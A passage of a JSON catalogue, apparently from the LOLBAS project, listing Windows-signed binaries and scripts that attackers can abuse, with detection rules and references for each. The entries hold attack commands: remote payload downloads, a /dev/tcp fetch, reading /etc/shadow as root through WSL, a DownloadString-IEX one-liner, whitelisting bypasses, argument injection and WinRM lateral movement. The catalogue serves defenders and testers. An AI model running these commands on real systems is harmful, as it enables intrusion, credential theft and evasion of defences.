(JIT) debugger included with Visual Studio","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"Vsjitdebugger.exe calc.exe","Description":"Executes calc.exe as a subprocess of Vsjitdebugger.exe.","Usecase":"Execution of local PE file as a subprocess of Vsjitdebugger.exe.","Category":"Execute","Privileges":"User","MitreID":"T1127","OperatingSystem":"Windows"}],"Full_Path":[{"Path":"c:\\windows\\system32\\vsjitdebugger.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml"}],"Resources":[{"Link":"https://twitter.com/pabraeken/status/990758590020452353"}],"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Vsjitdebugger/"},{"Name":"Wfc.exe","Description":"The Workflow Command-line Compiler tool is included with the Windows Software Development Kit (SDK).","Author":"Jimmy (@bohops)","Created":"2021-09-26","Commands":[{"Command":"wfc.exe c:\\path\\to\\test.xoml","Description":"Execute arbitrary C# code embedded in a XOML file.","Usecase":"Execute proxied payload with Microsoft signed binary to bypass WDAC policies","Category":"AWL Bypass","Privileges":"User","MitreID":"T1127","OperatingSystem":"Windows 10 2004 (likely previous and newer versions as well)"}],"Full_Path":[{"Path":"C:\\Program Files (x86)\\Microsoft SDKs\\Windows\\v10.0A\\bin\\NETFX 4.8 Tools\\wfc.exe"}],"Detection":[{"BlockRule":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_wfc.yml"},{"IOC":"As a Windows SDK binary, execution on a system may be suspicious"}],"Resources":[{"Link":"https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/"}],"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wfc/"},{"Name":"WinProj.exe","Description":"Microsoft Project Executable","Author":"Avihay Eldad","Created":"2024-02-14","Commands":[{"Command":"WinProj.exe https://example.com/payload","Description":"Downloads payload from remote server","Usecase":"It will download a remote payload and place it in INetCache.","Category":"Download","Privileges":"User","MitreID":"T1105","OperatingSystem":"Windows","Tags":[{"Download":"INetCache"}]}],"Full_Path":[{"Path":"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WinProj.exe"},{"Path":"C:\\Program Files\\Microsoft Office\\Office14\\WinProj.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Office\\Office15\\WinProj.exe"},{"Path":"C:\\Program Files\\Microsoft Office\\Office15\\WinProj.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Office\\Office16\\WinProj.exe"},{"Path":"C:\\Program Files\\Microsoft Office\\Office16\\WinProj.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Office\\root\\Office14\\WinProj.exe"},{"Path":"C:\\Program Files\\Microsoft Office\\root\\Office14\\WinProj.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Office\\root\\Office15\\WinProj.exe"},{"Path":"C:\\Program Files\\Microsoft Office\\root\\Office15\\WinProj.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\WinProj.exe"},{"Path":"C:\\Program Files\\Microsoft Office\\root\\Office16\\WinProj.exe"}],"Detection":[{"IOC":"URL on a WinProj command line"},{"IOC":"WinProj making unexpected network connections or DNS requests"}],"Resources":null,"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winproj/"},{"Name":"Winword.exe","Description":"Microsoft Office binary","Author":"Reegun J (OCBC Bank)","Created":"2019-07-19","Commands":[{"Command":"winword.exe \"http://192.168.1.10/TeamsAddinLoader.dll\"","Description":"Downloads payload from remote server","Usecase":"It will download a remote payload and place it in INetCache.","Category":"Download","Privileges":"User","MitreID":"T1105","OperatingSystem":"Windows","Tags":[{"Download":"INetCache"}]}],"Full_Path":[{"Path":"C:\\Program Files\\Microsoft Office\\root\\Office16\\winword.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\winword.exe"},{"Path":"C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\winword.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Office\\Office16\\winword.exe"},{"Path":"C:\\Program Files\\Microsoft Office\\Office16\\winword.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\winword.exe"},{"Path":"C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\winword.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Office\\Office15\\winword.exe"},{"Path":"C:\\Program Files\\Microsoft Office\\Office15\\winword.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\winword.exe"},{"Path":"C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\winword.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Office\\Office14\\winword.exe"},{"Path":"C:\\Program Files\\Microsoft Office\\Office14\\winword.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Office\\Office12\\winword.exe"},{"Path":"C:\\Program Files\\Microsoft Office\\Office12\\winword.exe"},{"Path":"C:\\Program Files\\Microsoft Office\\Office12\\winword.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_office_arbitrary_cli_download.yml"},{"IOC":"Suspicious Office application Internet/network traffic"}],"Resources":[{"Link":"https://twitter.com/reegun21/status/1150032506504151040"},{"Link":"https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191"}],"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/"},{"Name":"Wsl.exe","Description":"Windows subsystem for Linux executable","Author":"Matthew Brown","Created":"2019-06-27","Commands":[{"Command":"wsl.exe -e /mnt/c/Windows/System32/calc.exe","Description":"Executes calc.exe from wsl.exe","Usecase":"Performs execution of specified file, can be used to execute arbitrary Linux commands.","Category":"Execute","Privileges":"User","MitreID":"T1202","OperatingSystem":"Windows 10, Windows Server 2019, Windows 11"},{"Command":"wsl.exe -u root -e cat /etc/shadow","Description":"Cats /etc/shadow file as root","Usecase":"Performs execution of arbitrary Linux commands as root without need for password.","Category":"Execute","Privileges":"User","MitreID":"T1202","OperatingSystem":"Windows 10, Windows Server 2019, Windows 11"},{"Command":"wsl.exe --exec bash -c \"<command>\"","Description":"Executes Linux command (for example via bash) as the default user (unless stated otherwise using `-u <username>`) on the default WSL distro (unless stated otherwise using `-d <distro name>`)","Usecase":"Performs execution of arbitrary Linux commands.","Category":"Execute","Privileges":"User","MitreID":"T1202","OperatingSystem":"Windows 10, Windows Server 2019, Windows 11"},{"Command":"wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'","Description":"Downloads file from 192.168.1.10","Usecase":"Download file","Category":"Download","Privileges":"User","MitreID":"T1105","OperatingSystem":"Windows 10, Windows Server 2019, Windows 11"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\wsl.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wsl_lolbin_execution.yml"},{"BlockRule":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"IOC":"Child process from wsl.exe"}],"Resources":[{"Link":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"Link":"https://twitter.com/nas_bench/status/1535431474429808642"}],"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/"},{"Name":"devtunnel.exe","Description":"Binary to enable forwarded ports on windows operating systems.","Author":"Kamran Saifullah","Created":"2023-09-16","Commands":[{"Command":"devtunnel.exe host -p 8080","Description":"Enabling a forwarded port for locally hosted service at port 8080 to be exposed on the internet.","Usecase":"Download Files, Upload Files, Data Exfiltration","Category":"Download","Privileges":"User","MitreID":"T1105","OperatingSystem":"Windows 10, Windows 11, MacOS"}],"Full_Path":[{"Path":"C:\\Users\\<username>\\AppData\\Local\\Temp\\.net\\devtunnel\\"},{"Path":"C:\\Users\\<username>\\AppData\\Local\\Temp\\DevTunnels"}],"Detection":[{"IOC":"devtunnel.exe binary spawned"},{"IOC":"*.devtunnels.ms"},{"IOC":"*.*.devtunnels.ms"},{"Analysis":"https://cydefops.com/vscode-data-exfiltration"}],"Resources":[{"Link":"https://code.visualstudio.com/docs/editor/port-forwarding"}],"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/devtunnels/"},{"Name":"vsls-agent.exe","Description":"Agent for Visual Studio Live Share (Code Collaboration)","Author":"Jimmy (@bohops)","Created":"2022-11-01","Commands":[{"Command":"vsls-agent.exe --agentExtensionPath c:\\path\\to\\payload.dll","Description":"Load a library payload using the --agentExtensionPath parameter (32-bit)","Usecase":"Execute proxied payload with Microsoft signed binary","Category":"Execute","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows 10 21H2 (likely previous and newer versions with modern versions of Visual Studio installed)","Tags":[{"Execute":"DLL"}]}],"Full_Path":[{"Path":"c:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Professional\\Common7\\IDE\\Extensions\\Microsoft\\LiveShare\\Agent\\vsls-agent.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_vslsagent_agentextensionpath_load.yml"}],"Resources":[{"Link":"https://twitter.com/bohops/status/1583916360404729857"}],"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/vsls-agent/"},{"Name":"vstest.console.exe","Description":"VSTest.Console.exe is the command-line tool to run tests","Author":"Onat Uzunyayla","Created":"2023-09-08","Commands":[{"Command":"vstest.console.exe testcode.dll","Description":"VSTest functionality may allow an adversary to executes their malware by wrapping it as a test method then build it to a .exe or .dll file to be later run by vstest.console.exe. This may both allow AWL bypass or defense bypass in general","Usecase":"Proxy Execution and AWL bypass, Adversaries may run malicious code embedded inside the test methods of crafted dll/exe","Category":"AWL Bypass","Privileges":"User","MitreID":"T1127","OperatingSystem":"Windows 10, Windows 11","Tags":[{"Execute":"DLL"}]}],"Full_Path":[{"Path":"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\TestWindow\\vstest.console.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2022\\TestAgent\\Common7\\IDE\\CommonExtensions\\Microsoft\\TestWindow\\vstest.console.exe"}],"Detection":[{"IOC":"vstest.console.exe spawning unexpected processes"}],"Resources":[{"Link":"https://learn.microsoft.com/en-us/visualstudio/test/vstest-console-options?view=vs-2022"}],"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/vstest.console/"},{"Name":"winfile.exe","Description":"Windows File Manager executable","Author":"Avihay Eldad","Created":"2024-04-30","Commands":[{"Command":"winfile.exe calc.exe","Description":"Execute an executable file with WinFile as a parent process.","Usecase":"Performs execution of specified file, can be used as a defense evasion","Category":"Execute","Privileges":"User","MitreID":"T1202","OperatingSystem":"Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\winfile.exe"},{"Path":"C:\\Windows\\winfile.exe"},{"Path":"C:\\Program Files\\WinFile\\winfile.exe"},{"Path":"C:\\Program Files (x86)\\WinFile\\winfile.exe"},{"Path":"C:\\Program Files\\WindowsApps\\Microsoft.WindowsFileManager_10.3.0.0_x64__8wekyb3d8bbwe\\WinFile\\winfile.exe"}],"Detection":null,"Resources":[{"Link":"https://github.com/microsoft/winfile"}],"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/winfile/"},{"Name":"CL_LoadAssembly.ps1","Description":"PowerShell Diagnostic Script","Author":"Jimmy (@bohops)","Created":"2021-09-26","Commands":[{"Command":"powershell.exe -ep bypass -command \"set-location -path C:\\Windows\\diagnostics\\system\\Audio; import-module .\\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\\..\\..\\..\\testing\\fun.dll;[Program]::Fun()\"","Description":"Proxy execute Managed DLL with PowerShell","Usecase":"Execute proxied payload with Microsoft signed binary","Category":"Execute","Privileges":"User","MitreID":"T1216","OperatingSystem":"Windows 10 21H1 (likely other versions as well), Windows 11","Tags":[{"Execute":"DLL"}]}],"Full_Path":[{"Path":"C:\\Windows\\diagnostics\\system\\Audio\\CL_LoadAssembly.ps1"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/ff6c54ded6b52f379cec11fe17c1ccb956faa660/rules/windows/process_creation/proc_creation_win_lolbas_cl_loadassembly.yml"}],"Resources":[{"Link":"https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/"}],"url":"https://lolbas-project.github.io/lolbas/Scripts/CL_LoadAssembly/"},{"Name":"CL_Mutexverifiers.ps1","Description":"Proxy execution with CL_Mutexverifiers.ps1","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":". C:\\Windows\\diagnostics\\system\\AERO\\CL_Mutexverifiers.ps1 \\nrunAfterCancelProcess calc.ps1","Description":"Import the PowerShell Diagnostic CL_Mutexverifiers script and call runAfterCancelProcess to launch an executable.","Usecase":"Proxy execution","Category":"Execute","Privileges":"User","MitreID":"T1216","OperatingSystem":"Windows 10"}],"Full_Path":[{"Path":"C:\\Windows\\diagnostics\\system\\WindowsUpdate\\CL_Mutexverifiers.ps1"},{"Path":"C:\\Windows\\diagnostics\\system\\Audio\\CL_Mutexverifiers.ps1"},{"Path":"C:\\Windows\\diagnostics\\system\\WindowsUpdate\\CL_Mutexverifiers.ps1"},{"Path":"C:\\Windows\\diagnostics\\system\\Video\\CL_Mutexverifiers.ps1"},{"Path":"C:\\Windows\\diagnostics\\system\\Speech\\CL_Mutexverifiers.ps1"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_cl_mutexverifiers.yml"}],"Resources":[{"Link":"https://twitter.com/pabraeken/status/995111125447577600"}],"url":"https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/"},{"Name":"CL_Invocation.ps1","Description":"Aero diagnostics script","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":". C:\\Windows\\diagnostics\\system\\AERO\\CL_Invocation.ps1 \\nSyncInvoke <executable> [args]","Description":"Import the PowerShell Diagnostic CL_Invocation script and call SyncInvoke to launch an executable.","Usecase":"Proxy execution","Category":"Execute","Privileges":"User","MitreID":"T1216","OperatingSystem":"Windows 10"}],"Full_Path":[{"Path":"C:\\Windows\\diagnostics\\system\\AERO\\CL_Invocation.ps1"},{"Path":"C:\\Windows\\diagnostics\\system\\Audio\\CL_Invocation.ps1"},{"Path":"C:\\Windows\\diagnostics\\system\\WindowsUpdate\\CL_Invocation.ps1"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_cl_invocation.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/powershell/powershell_script/posh_ps_cl_invocation_lolscript.yml"}],"Resources":[{"Link":null}],"url":"https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/"},{"Name":"Launch-VsDevShell.ps1","Description":"Locates and imports a Developer PowerShell module and calls the Enter-VsDevShell cmdlet","Author":"Nasreddine Bencherchali","Created":"2022-06-13","Commands":[{"Command":"powershell -ep RemoteSigned -f .\\Launch-VsDevShell.ps1 -VsWherePath \"C:\\windows\\system32\\calc.exe\"","Description":"Execute binaries from the context of the signed script using the \"VsWherePath\" flag.","Usecase":"Proxy execution","Category":"Execute","Privileges":"User","MitreID":"T1216","OperatingSystem":"Windows 10, Windows 11"},{"Command":"powershell -ep RemoteSigned -f .\\Launch-VsDevShell.ps1 -VsInstallationPath \"/../../../../../; calc.exe ;\"","Description":"Execute binaries and commands from the context of the signed script using the \"VsInstallationPath\" flag.","Usecase":"Proxy execution","Category":"Execute","Privileges":"User","MitreID":"T1216","OperatingSystem":"Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\Tools\\Launch-VsDevShell.ps1"},{"Path":"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\Tools\\Launch-VsDevShell.ps1"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml"}],"Resources":[{"Link":"https://twitter.com/nas_bench/status/1535981653239255040"}],"url":"https://lolbas-project.github.io/lolbas/Scripts/Launch-VsDevShell/"},{"Name":"Manage-bde.wsf","Description":"Script for managing BitLocker","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"set comspec=c:\\windows\\system32\\calc.exe & cscript c:\\windows\\system32\\manage-bde.wsf","Description":"Set the comspec variable to another executable prior to calling manage-bde.wsf for execution.","Usecase":"Proxy execution from script","Category":"Execute","Privileges":"User","MitreID":"T1216","OperatingSystem":"Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"copy c:\\users\\person\\evil.exe c:\\users\\public\\manage-bde.exe & cd c:\\users\\public\\ & cscript.exe c:\\windows\\system32\\manage-bde.wsf","Description":"Run the manage-bde.wsf script with a payload named manage-bde.exe in the same directory to run the payload file.","Usecase":"Proxy execution from script","Category":"Execute","Privileges":"User","MitreID":"T1216","OperatingSystem":"Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\manage-bde.wsf"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_manage_bde.yml"},{"IOC":"Manage-bde.wsf should not be invoked by a standard user under normal situations"}],"Resources":[{"Link":"https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712"},{"Link":"https://twitter.com/bohops/status/980659399495741441"},{"Link":"https://twitter.com/JohnLaTwC/status/1223292479270600706"}],"url":"https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/"},{"Name":"Pubprn.vbs","Description":"Proxy execution with Pubprn.vbs","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"pubprn.vbs 127.0.0.1 script:https://domain.com/folder/file.sct","Description":"Set the 2nd variable with a Script COM moniker to perform Windows Script Host (WSH) Injection","Usecase":"Proxy execution","Category":"Execute","Privileges":"User","MitreID":"T1216.001","OperatingSystem":"Windows 10"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\pubprn.vbs"},{"Path":"C:\\Windows\\SysWOW64\\Printing_Admin_Scripts\\en-US\\pubprn.vbs"}],"Detection":[{"BlockRule":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/process_creation/proc_creation_win_lolbin_pubprn.yml"}],"Resources":[{"Link":"https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/"},{"Link":"https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology"},{"Link":"https://github.com/enigma0x3/windows-operating-system-archaeology"}],"url":"https://lolbas-project.github.io/lolbas/Scripts/Pubprn/"},{"Name":"Syncappvpublishingserver.vbs","Description":"Script used related to app-v and publishing server","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"SyncAppvPublishingServer.vbs \"n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX\"","Description":"Inject PowerShell script code with the provided arguments","Usecase":"Use Powershell host invoked from vbs script","Category":"Execute","Privileges":"User","MitreID":"T1216.002","OperatingSystem":"Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\SyncAppvPublishingServer.vbs"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml"}],"Resources":[{"Link":"https://twitter.com/monoxgas/status/895045566090010624"},{"Link":"https://twitter.com/subTee/status/855738126882316288"}],"url":"https://lolbas-project.github.io/lolbas/Scripts/Syncappvpublishingserver/"},{"Name":"UtilityFunctions.ps1","Description":"PowerShell Diagnostic Script","Author":"Jimmy (@bohops)","Created":"2021-09-26","Commands":[{"Command":"powershell.exe -ep bypass -command \"set-location -path c:\\windows\\diagnostics\\system\\networking; import-module .\\UtilityFunctions.ps1; RegSnapin ..\\..\\..\\..\\temp\\unsigned.dll;[Program.Class]::Main()\"","Description":"Proxy execute Managed DLL with PowerShell","Usecase":"Execute proxied payload with Microsoft signed binary","Category":"Execute","Privileges":"User","MitreID":"T1216","OperatingSystem":"Windows 10 21H1 (likely other versions as well), Windows 11","Tags":[{"Execute":"DLL"}]}],"Full_Path":[{"Path":"C:\\Windows\\diagnostics\\system\\Networking\\UtilityFunctions.ps1"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/0.21-688-gd172b136b/rules/windows/process_creation/proc_creation_win_lolbas_utilityfunctions.yml"}],"Resources":[{"Link":"https://twitter.com/nickvangilder/status/1441003666274668546"}],"url":"https://lolbas-project.github.io/lolbas/Scripts/UtilityFunctions/"},{"Name":"winrm.vbs","Description":"Script used for manage Windows RM settings","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"winrm invoke Create wmicimv2/Win32_Process @{CommandLine=\"notepad.exe\"} -r:http://target:5985","Description":"Lateral movement/Remote Command Execution via WMI Win32_Process class over the WinRM protocol","Usecase":"Proxy execution","Category":"Execute","Privileges":"User","MitreID":"T1216","OperatingSystem":"Windows 10, Windows 11"},{"Command":"winrm invoke Create wmicimv2/Win32_Service @{Name=\"Evil\";DisplayName=\"Evil\";PathName=\"cmd.exe /k c:\\windows\\system32\\notepad.exe\"} -r:http://acmedc:5985 && winrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985","Description":"Lateral movement/Remote Command Execution via WMI Win32_Service class over the WinRM protocol","Usecase":"Proxy execution","Category":"Execute","Privileges":"Admin","MitreID":"T1216","OperatingSystem":"Windows 10, Windows 11"},{"Command":"%SystemDrive%\\BypassDir\\cscript //nologo %windir%\\System32\\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty","Description":"Bypass AWL solutions by copying cscript.exe to an attacker-controlled location; creating a malicious WsmPty.xsl in the same location, and executing winrm.vbs via the relocated cscript.exe.","Usecase":"Execute arbitrary, unsigned code via XSL script","Category":"AWL Bypass","Privileges":"User","MitreID":"T1220","OperatingSystem":"Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\winrm.vbs"},{"Path":"C:\\Windows\\SysWOW64\\winrm.vbs"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_winrm_awl_bypass.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/file/file_event/file_event_win_winrm_awl_bypass.yml"},{"BlockRule":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"}],"Resources":[{"Link":"https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology"},{"Link":"https://www.youtube.com/watch?v=3gz1QmiMhss"},{"Link":"https://github.com/enigma0x3/windows-operating-system-archaeology"},{"Link":"https://redcanary.com/blog/lateral-movement-winrm-wmi/"},{"Link":"https://twitter.com/bohops/status/994405551751815170"},{"Link":"https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404"},{"Link":"https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf"}],"url":"https://lolbas-project.github.io/lolbas/Scripts/Winrm/"},{"Name":"Pester.bat","Description":"Used as part of the Powershell pester","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"Pester.bat [/help|?|-?|/?] \"$null; notepad\"","Description":"Execute code using Pester. The third parameter can be anything. The fourth is the payload. Example here executes notepad","Usecase":"Proxy execution","Category":"Execute","Privileges":"User","MitreID":"T1216","OperatingSystem":"Windows 10, Windows 11"},{"Command":"Pester.bat ;calc.exe","Description":"Execute code using Pester. Example here executes calc.exe","Usecase":"Proxy execution","Category":"Execute","Privileges":"User","MitreID":"T1216","OperatingSystem":"Windows 10, Windows 11"},{"Command":"Pester.bat ;calc.exe","Description":"Execute code using Pester. Example here executes calc.exe","Usecase":"Proxy execution","Category":"Execute","Privileges":"User","MitreID":"T1216","OperatingSystem":"Windows 10, Windows 11"}],"Full_Path":[{"Path":"c:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\bin\\Pester.bat"},{"Path":"c:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*\\bin\\Pester.bat"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_pester_1.yml"}],"Resources":[{"Link":"https://twitter.com/Oddvarmoe/status/993383596244258816"},{"Link":"https://twitter.com/_st0pp3r_/status/1560072680887525378"},{"Link":"https://twitter.com/_st0pp3r_/status/1560072680887525378"}],"url":"https://lolbas-project.github.io/lolbas/Scripts/pester/"}]
|